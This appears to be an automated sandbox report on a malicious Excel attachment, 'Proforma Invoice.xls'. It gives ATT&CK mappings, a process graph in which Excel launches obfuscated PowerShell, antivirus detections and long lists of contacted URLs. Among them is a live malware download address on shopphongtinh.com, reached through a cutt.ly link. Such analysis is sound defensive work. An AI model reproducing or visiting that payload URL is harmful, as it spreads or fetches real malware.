Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1DLL Side-Loading1Process Injection11Masquerading1OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting32Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting32Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 320373 Sample: Proforma Invoice.xls Startdate: 19/11/2020 Architecture: WINDOWS Score: 92 37 Antivirus detection for URL or domain 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->41 43 6 other signatures 2->43 7 EXCEL.EXE 71 38 2->7         started        process3 file4 31 C:\Users\user\...\Proforma Invoice.xls.LNK, MS 7->31 dropped 45 Obfuscated command line found 7->45 47 Document exploit detected (process start blacklist hit) 7->47 11 cmd.exe 1 7->11         started        14 cmd.exe 1 7->14         started        16 cmd.exe 1 7->16         started        signatures5 process6 signatures7 49 Obfuscated command line found 11->49 18 powershell.exe 15 21 11->18         started        21 conhost.exe 11->21         started        23 powershell.exe 17 14->23         started        25 conhost.exe 14->25         started        27 powershell.exe 26 16->27         started        29 conhost.exe 16->29         started        process8 dnsIp9 33 cutt.ly 104.22.1.232, 443, 49731 CLOUDFLARENETUS United States 18->33 35 shopphongtinh.com 202.92.6.10, 443, 49737 VNPT-AS-VNVNPTCorpVN Viet Nam 18->35

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Proforma Invoice.xls14%VirustotalBrowse
Proforma Invoice.xls21%ReversingLabsDocument-Word.Downloader.Powdow

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
cutt.ly1%VirustotalBrowse
shopphongtinh.com5%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://shopphongtinh.com40%Avira URL Cloudsafe
https://cutt.ly/ZhqUH1O0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
http://crl.micro0%URL Reputationsafe
http://crl.micro0%URL Reputationsafe
http://crl.micro0%URL Reputationsafe
http://crl.micro0%URL Reputationsafe
http://crl.microsof0%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://cutt.ly0%Avira URL Cloudsafe
https://shopphongtinh.com/Ubnccbruoun7.exe100%Avira URL Cloudmalware
http://crl.microsoft.co0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
http://status.rapidssl.com00%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cutt.ly
104.22.1.232
truetrueunknown
shopphongtinh.com
202.92.6.10
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
    high
    https://login.microsoftonline.com/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
      high
      https://shell.suite.office.com:1443858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
          high
          http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
              high
              https://cdn.entity.858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                high
                https://wus2-000.contentsync.858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                    high
                    https://powerlift.acompli.net858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                      high
                      https://cortana.ai858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                high
                                https://api.aadrm.com/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                      high
                                      https://cr.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                        high
                                        https://shopphongtinh.com4powershell.exe, 00000006.00000002.386277042.0000000004987000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cutt.ly/ZhqUH1OPowerShell_transcript.581804.sxhBoU5o.20201119100421.txt.6.drtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://portal.office.com/account/?ref=ClientMeControl858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.385123620.0000000004721000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.411599928.0000000004721000.00000004.00000001.sdmpfalse
                                            high
                                            https://ecs.office.com/config/v2/Office858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                              high
                                              https://graph.ppe.windows.net858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.383638755.0000000007DB1000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://wus2-000.pagecontentsync.858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.383638755.0000000007DB1000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplate858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetect858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.ms858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                high
                                                                https://graph.windows.net858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.383638755.0000000007DB1000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://officesetup.getmicrosoftkey.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://analysis.windows.net/powerbi/api858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                      high
                                                                      https://prod-global-autodetect.acompli.net/autodetect858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.json858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                        high
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                          high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                            high
                                                                            http://crl.micropowershell.exe, 00000009.00000003.430528579.00000000095CD000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                              high
                                                                              http://crl.microsofpowershell.exe, 00000006.00000003.274685863.0000000007514000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                high
                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                  high
                                                                                  http://weather.service.msn.com/data.aspx858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                    high
                                                                                    https://apis.live.net/v5.0/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                      high
                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                        high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                          high
                                                                                          https://management.azure.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                              high
                                                                                              https://incidents.diagnostics.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                high
                                                                                                https://clients.config.office.net/user/v1.0/ios858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                  high
                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                    high
                                                                                                    https://o365auditrealtimeingestion.manage.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                      high
                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                        high
                                                                                                        https://api.office.net858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                          high
                                                                                                          https://incidents.diagnosticssdf.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                            high
                                                                                                            https://asgsmsproxyapi.azurewebsites.net/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://clients.config.office.net/user/v1.0/android/policies858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                              high
                                                                                                              https://cutt.lypowershell.exe, 00000006.00000003.376490691.0000000008D79000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.385597645.0000000004863000.00000004.00000001.sdmptrue
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://entitlement.diagnostics.office.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                high
                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                  high
                                                                                                                  https://shopphongtinh.com/Ubnccbruoun7.exepowershell.exe, 00000006.00000002.386239949.0000000004983000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.386277042.0000000004987000.00000004.00000001.sdmptrue
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://autodiscover-s.outlook.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                    high
                                                                                                                    https://storage.live.com/clientlogs/uploadlocation858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                      high
                                                                                                                      https://templatelogging.office.com/client/log858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                          high
                                                                                                                          http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0Lpowershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://crl.microsoft.copowershell.exe, 00000008.00000003.380298000.0000000008CAD000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://management.azure.com/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus-000.contentsync.858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://login.windows.net/common/oauth2/authorize858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/imports858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.com858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                          high
